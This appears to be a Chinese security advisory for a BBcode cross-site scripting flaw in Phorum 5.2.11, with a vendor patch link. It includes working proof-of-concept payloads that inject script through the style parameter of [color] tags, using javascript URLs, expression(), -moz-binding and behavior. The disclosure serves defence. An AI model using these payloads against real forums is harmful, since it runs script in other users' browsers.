影响版本: Phorum 5.2.11

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB论坛程序，可在Linux和Unix操作系统下使用，也可在Microsoft Windows操作系统下使用。  Phorum的过滤引擎没有充分地验证某些BBcode参数，远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。<*参考   crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

测试方法: [www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建议: 厂商补丁： Phorum

目前厂商已经发布了升级补丁以修复这个安全问题。

请到厂商的主页下载： http://www.phorum.org/phorum5/read.php?64,139411

【编辑推荐】

1. Macromedia ColdFusion日志条目HTML注入漏洞
2. 多家厂商的web漏洞扫描程序存在HTML注入漏洞
3. Rockliffe 邮件信息HTML注入漏洞